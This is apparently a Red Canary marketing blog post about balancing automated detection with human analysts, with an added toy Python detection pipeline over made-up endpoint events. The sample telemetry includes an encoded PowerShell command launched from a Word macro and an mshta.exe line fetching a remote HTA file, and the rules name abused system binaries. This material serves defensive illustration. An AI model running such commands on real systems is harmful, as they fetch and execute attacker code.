The division of security labor between human and machine is constantly shifting. Depending on your organization’s maturity and size, it can be difficult to find the right balance.
At Red Canary, our philosophy is to start from the outcome you’re trying to deliver. To find the optimal role for the analyst, it’s helpful to ask: “What would my analyst need to do to spot a threat among all the noise?” Once you’ve identified what the human needs, the goal is to automate the rest of the process as far as possible, because unnecessary human involvement slows down response. That’s why we start with the known threats we’re trying to detect and then build detection rules and analytics to find them. At the front end of that threat filter, automation is dealing with a large volume of noise and false positives. As progressively more specific rules are applied, less important activity is filtered out until we are left with a much smaller set of likely threats that warrant additional analysis.
That’s where the human element becomes most valuable.
Push automation as far as it can go
The further we can extend this filtering, the more we free our human analysts for higher-level work such as examining threats, establishing attack timelines, and pinpointing the root cause of an intrusion. It’s a matter of pushing automation as far into the process as possible, and we haven’t yet reached the limits of what machine intelligence can do in this sphere.
That’s not to say that automation will ever take over the human component of security. It would make scaling easier, but there will always be insight, analysis, and investigation from human beings that machines cannot replicate. While automation may not be possible for every class of threat, the range of threats that can be detected and responded to automatically will continue to expand. The goal is to monitor more with fewer people, while getting the most assistance possible from automation.
So where is machine intelligence best used? Patterns of behavior.
The Red Canary detection pipeline is based on behavior analytics. We look at chains of behaviors on endpoints and other data sources that indicate a likely threat. Automation and machine intelligence are great at seeing patterns of anomalies or behaviors that warrant an analyst’s attention—but that’s not the end of automation’s role.
Once a pattern has been surfaced for an analyst, automation can compare that suspicious pattern against the many threats seen before. That speeds up and sharpens our ability to apply a response that has already proven effective. If the pattern is new, the analyst can focus immediately on analyzing the threat and providing the proper remediation guidance. Using automation this way considerably shortens the mean time to respond.
Analysis by exception
We call this process “analysis by exception.” It makes the best use of our experts’ time by tasking them only with the work they are uniquely suited to and that has no automated alternative. To sustain this level of efficiency, however, it’s critical to keep our threat information up to date and our automation reliable.
Not only does this approach increase the speed and efficiency of detection and response, but it also frees analysts to help create the rules that make the automated processes effective. It’s a virtuous cycle: each resolved case improves future outcomes, and analysts gain time to fine-tune their defensive approach for further gains.
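To make the behavior-chain analytics and “analysis by exception” flow described above concrete, here is a toy pipeline added as an illustration; it is not Red Canary’s code and does not reflect their actual detection logic. It assumes a stream of endpoint process-start events with parent/child links, a small allowlist of benign parent/child pairs as the noise filter, a few chain-based analytics, and a library of previously seen chains mapped to a response playbook. All events, rule names, fingerprints, and playbook text are constructed for the example.

```python
"""Toy 'analysis by exception' pipeline over constructed endpoint process events.

Stage 1 drops known-benign parent/child pairs as noise, stage 2 runs
behavior-chain analytics over process ancestry, stage 3 compares what survives
against a small library of previously seen threat chains so that only chains
automation cannot settle reach the analyst. Every event, rule name, threat
fingerprint and playbook string below is constructed for illustration.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    host: str
    pid: int
    ppid: int
    image: str      # lowercase executable name
    cmdline: str


@dataclass
class Triage:
    host: str
    fingerprint: Tuple[str, ...]   # process chain, oldest ancestor first
    rules: List[str]               # analytics that fired on this chain
    playbook: Optional[str]        # proven response if chain is known, else None

    @property
    def needs_analyst(self) -> bool:
        return self.playbook is None


# Constructed sample telemetry: a macro dropper on ws01, normal service activity
# on ws02, and an Excel-to-mshta chain on ws03 that no prior playbook covers.
EVENTS = [
    ProcEvent("ws01", 100, 1,   "explorer.exe",   "explorer.exe"),
    ProcEvent("ws01", 200, 100, "winword.exe",    "winword.exe invoice.docm"),
    ProcEvent("ws01", 300, 200, "cmd.exe",        "cmd.exe /c powershell -enc SQBFAFgA..."),
    ProcEvent("ws01", 400, 300, "powershell.exe", "powershell -enc SQBFAFgA..."),
    ProcEvent("ws02", 100, 1,   "services.exe",   "services.exe"),
    ProcEvent("ws02", 250, 100, "svchost.exe",    "svchost.exe -k netsvcs"),
    ProcEvent("ws03", 100, 1,   "explorer.exe",   "explorer.exe"),
    ProcEvent("ws03", 500, 100, "excel.exe",      "excel.exe report.xlsm"),
    ProcEvent("ws03", 600, 500, "mshta.exe",      "mshta.exe http://203.0.113.10/a.hta"),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
LOLBINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe"}

# Stage 1: parent/child pairs treated as noise; they never trigger analytics
# but stay in the process tree so they can still appear as ancestors.
BENIGN_PAIRS = {("services.exe", "svchost.exe"), ("explorer.exe", "winword.exe"),
                ("explorer.exe", "excel.exe")}

# Stage 2: each analytic sees the ancestry chain, child first, up to 3 ancestors.
RULES: Dict[str, Callable[[List[ProcEvent]], bool]] = {
    "office_spawns_shell":  lambda c: c[0].image in SHELLS and any(a.image in OFFICE for a in c[1:4]),
    "office_spawns_lolbin": lambda c: c[0].image in LOLBINS and any(a.image in OFFICE for a in c[1:4]),
    "encoded_powershell":   lambda c: c[0].image == "powershell.exe" and "-enc" in c[0].cmdline.lower(),
}

# Stage 3: chains seen before, with the response that worked last time.
KNOWN_THREATS: Dict[Tuple[str, ...], str] = {
    ("winword.exe", "cmd.exe", "powershell.exe"):
        "macro dropper: isolate host, kill process tree, reset user credentials",
}


def ancestry(ev: ProcEvent, index: Dict[Tuple[str, int], ProcEvent]) -> List[ProcEvent]:
    """Walk ppid links on the same host; returns [ev, parent, grandparent, ...]."""
    chain, seen = [ev], {ev.pid}
    while True:
        parent = index.get((ev.host, chain[-1].ppid))
        if parent is None or parent.pid in seen:   # root reached or pid reuse loop
            return chain
        chain.append(parent)
        seen.add(parent.pid)


def trim(chain: List[ProcEvent]) -> List[ProcEvent]:
    """Cut the chain at the first Office ancestor (the likely initial access), else keep 4 levels."""
    for i, ev in enumerate(chain):
        if ev.image in OFFICE:
            return chain[:i + 1]
    return chain[:4]


def run_pipeline(events: List[ProcEvent]) -> List[Triage]:
    """Return one Triage per suspicious chain root; only unknown chains need an analyst."""
    index = {(e.host, e.pid): e for e in events}
    groups: Dict[Tuple[str, int], Triage] = {}
    for ev in events:
        parent = index.get((ev.host, ev.ppid))
        if parent and (parent.image, ev.image) in BENIGN_PAIRS:
            continue                                    # stage 1: noise
        chain = ancestry(ev, index)
        fired = [name for name, rule in RULES.items() if rule(chain)]
        if not fired:
            continue                                    # stage 2: nothing suspicious
        trimmed = trim(chain)
        fp = tuple(e.image for e in reversed(trimmed))
        key = (ev.host, trimmed[-1].pid)                # collapse alerts sharing a root
        cur = groups.get(key)
        rules = sorted(set(fired) | set(cur.rules if cur else []))
        if cur is None or len(fp) > len(cur.fingerprint):
            groups[key] = Triage(ev.host, fp, rules, KNOWN_THREATS.get(fp))  # stage 3
        else:
            cur.rules = rules
    return list(groups.values())


if __name__ == "__main__":
    for t in run_pipeline(EVENTS):
        status = "ANALYST REVIEW" if t.needs_analyst else f"known, playbook: {t.playbook}"
        print(f"{t.host}: {' -> '.join(t.fingerprint)} [{', '.join(t.rules)}] {status}")
```

Only two chains survive the three stages: the Word-to-PowerShell chain on ws01 matches a known fingerprint and carries its proven playbook straight through, while the Excel-to-mshta chain on ws03 has no prior match and is the one exception routed to a human. The benign service activity on ws02 never reaches the analyst at all, which is the point of the filter.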
Part of the benefit of this human-machine cooperation from Red Canary is that you don’t have to do it. We provide both the machine and the human sides, so you don’t have to add headcount or invest in security training. We’ve been on this learning curve for years just so you don’t have to be.
Find out more about how Red Canary adds the right balance of human and automated capabilities to your cybersecurity.